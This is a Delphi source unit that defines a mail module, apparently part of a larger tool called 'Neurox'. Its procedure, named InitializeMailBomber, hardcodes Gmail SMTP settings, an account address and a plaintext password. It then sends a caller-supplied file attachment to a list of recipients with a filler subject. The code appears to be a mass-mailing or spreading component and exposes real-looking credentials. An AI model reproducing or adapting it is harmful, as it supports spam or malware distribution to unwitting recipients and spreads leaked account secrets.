unit ModuleMail;

interface

uses
  ModuleNeurox, Classes,
  IdIOHandler, IdIOHandlerSocket, IdIOHandlerStack, IdSSL,
  IdSSLOpenSSL, IdComponent, IdTCPConnection, IdTCPClient,
  IdExplicitTLSClientServerBase, IdMessageClient, IdSMTPBase, IdSMTP,
  IdBaseComponent, IdMessage, IdAttachmentFile;

  type
    TModuleMail = class(TNeurox)
      private
        FHost: string;
        FUser: string;
        FPort: integer;
        FMailFrom: string;
        FPassword: string;
        FInitialized: boolean;
        FAttachment: string;
        FDestinations: TStringList;
        FIdSSLIOHandlerSocketOpenSSL : TIdSSLIOHandlerSocketOpenSSL;
        FIdSMTP : TIdSMTP;
        FIdMessage: TIdMessage;
      public
        procedure InitializeMailBomber(Attachment: string; Dest: TStringList);
        procedure SendMail;
    end;

implementation

procedure TModuleMail.InitializeMailBomber(Attachment: string; Dest: TStringList);
begin
  FHost:= 'smtp.gmail.com';
  FPort:= 587;
  FUser:= 'tanisperez@gmail.com';
  FmailFrom:= 'tanisperez@gmail.com';
  FPassword:= 'borcealple';
  FAttachment:= Attachment;
  FDestinations:= TStringList.create;
  FDestinations.AddStrings(Dest);
  FInitialized:= true;
end;

procedure TModuleMail.SendMail;
var
i: integer;
begin
  if FInitialized = false then exit;
  
  FIdSSLIOHandlerSocketOpenSSL:= TIdSSLIOHandlerSocketOpenSSL.Create(nil);
  FIdSSLIOHandlerSocketOpenSSL.SSLOptions.Method:=sslvTLSv1;
  FIdSSLIOHandlerSocketOpenSSL.SSLOptions.Mode:=sslmUnassigned;

  FIdSMTP:= TIdSMTP.Create(nil);
  FIdSMTP.Host:=  FHost;
  FIdSMTP.Port:= FPort;
  FIdSMTP.IOHandler:= FIdSSLIOHandlerSocketOpenSSL;
  FIdSMTP.UseTLS:=utUseExplicitTLS;
  FIdSMTP.Username:=FUser;
  FIdSMTP.Password:=FPassword;

  FIdMessage:= TIdMessage.Create(nil);
  FIdMessage.From.Address:=FmailFrom;
  TIdAttachmentFile.Create(FIdMessage.MessageParts, FAttachment);
  //FIdMessage.Recipients.EMailAddresses:='tanisperez@gmail.com';
  //FIdMessage.Recipients.GetDomains(FDestinations);
  for i := 0 to FDestinations.Count -1 do begin
  FIdMessage.Recipients.Add.Address:= FDestinations.strings[i];
  end;

  FIdMessage.Subject:='asdasdas';
  FIdMessage.Body.Add('Contenido del mail');

  FIdSMTP.Connect;
  FIdSMTP.Send(FIdMessage);
  FIdSMTP.Disconnect;

end;


end.
